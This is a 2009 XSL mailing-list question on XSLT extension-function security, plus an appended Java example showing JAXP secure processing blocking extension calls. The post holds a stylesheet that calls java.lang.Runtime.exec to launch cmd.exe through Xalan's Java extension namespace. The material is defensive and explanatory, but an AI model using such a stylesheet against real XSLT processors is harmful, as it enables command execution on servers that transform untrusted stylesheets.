Subject: [xsl] Can an XSLT document invoke arbitrary extension functions?
From: "Costello, Roger L." <costello@xxxxxxxxx>
Date: Mon, 26 Oct 2009 16:40:21 -0400
Hi Folks,

Below is an XSLT transform that - supposedly - opens a DOS command prompt. I saw the XSLT transform in this [1] briefing (slide 132). I ran it. It doesn't work; it just produces an error.

The briefing seems to suggest that XSLT is riddled with security leaks, as any XSLT transform can invoke pretty much any arbitrary function (apparently including, as the below XSLT transform shows, any arbitrary Windows function).

Questions:

1. Should the below XSLT transform work? (i.e. is there simply a minor bug in it, that when fixed, would make it operate as desired?)

2. Is there any control over the set of extension functions provided by XSLT processors?

3. How do you respond to the briefing's suggestions that XSLT is riddled with security leaks? (I realize this is a broad question; any thoughts you have would be appreciated)

    <?xml version="1.0"?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
                    xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
                    extension-element-prefixes="rt ob"
                    version="1.0">
      <xsl:template match="/">
        <!-- Xalan Java extension namespace: a static call on java.lang.Runtime -->
        <xsl:variable name="runTimeObject" select="rt:getRuntime()"/>
        <!-- Instance method call: the first argument is the target object -->
        <xsl:variable name="command" select="rt:exec($runTimeObject, 'c:\Windows\system32\cmd.exe')"/>
        <!-- Object.toString() on the returned java.lang.Process -->
        <xsl:variable name="commandAsString" select="ob:toString($command)"/>
        <xsl:value-of select="$commandAsString"/>
      </xsl:template>
    </xsl:stylesheet>

/Roger

[1] https://www.isecpartners.com/files/iSEC_HILL_AttackingXMLSecurity_bh07.pdf
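Question 2 above asks whether the set of extension functions can be controlled. The following is an added example, not code from the post or from the briefing it cites: a small JAXP program that feeds a constructed probe stylesheet to the platform's default TransformerFactory twice, once with defaults and once with the standard JAXP secure-processing feature switched on. The probe uses the same Xalan Java-extension namespace mechanism as the stylesheet in the post but calls the static method java.lang.System.getProperty instead of Runtime.exec, so running it launches nothing; the class name ExtensionFunctionCheck and the probe stylesheet are this example's own choices.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class ExtensionFunctionCheck {

    // Constructed probe stylesheet (not the one from the post). The namespace
    // URI "http://xml.apache.org/xalan/java/<class>" is the Xalan/XSLTC Java
    // extension mechanism: any prefix bound to it makes that class's methods
    // callable from XPath. A harmless static call is used instead of exec().
    static final String PROBE =
        "<xsl:stylesheet version='1.0'"
      + "  xmlns:xsl='http://www.w3.org/1999/XSL/Transform'"
      + "  xmlns:sys='http://xml.apache.org/xalan/java/java.lang.System'>"
      + "  <xsl:output method='text'/>"
      + "  <xsl:template match='/'>"
      + "    <xsl:value-of select=\"sys:getProperty('java.version')\"/>"
      + "  </xsl:template>"
      + "</xsl:stylesheet>";

    /**
     * Compiles and runs PROBE against a trivial input document.
     * Returns the transform output, or the processor's error message if the
     * extension call was refused.
     */
    static String run(boolean secureProcessing) {
        try {
            TransformerFactory tf = TransformerFactory.newInstance();
            if (secureProcessing) {
                // Standard JAXP switch. With it on, Xalan-J and the JDK's
                // built-in XSLTC reject extension functions and extension
                // elements instead of resolving them to Java classes.
                tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            }
            // XSLTC compiles the stylesheet here, so a refused extension call
            // surfaces as a TransformerConfigurationException at this point.
            Transformer t = tf.newTransformer(new StreamSource(new StringReader(PROBE)));
            StringWriter out = new StringWriter();
            t.transform(new StreamSource(new StringReader("<doc/>")), new StreamResult(out));
            return "OUTPUT: " + out;
        } catch (TransformerException e) {
            // TransformerConfigurationException is a subclass, so both the
            // compile-time and the run-time refusal land here.
            return "REFUSED: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        System.out.println("default processing : " + run(false));
        System.out.println("secure processing  : " + run(true));
    }
}
```

Run it with the JDK's built-in processor or with Xalan-J on the classpath: the first line prints the JVM's java.version, showing that a stylesheet alone, with no code of the application's own, reached into java.lang.System; the second line shows the same stylesheet being refused. The practical rule for anything that transforms stylesheets it did not write is to set FEATURE_SECURE_PROCESSING on every TransformerFactory, and to treat the stylesheet as untrusted code otherwise. Processors have their own equivalents, for example Saxon's allow-external-functions configuration setting, which disables its reflexive Java calls.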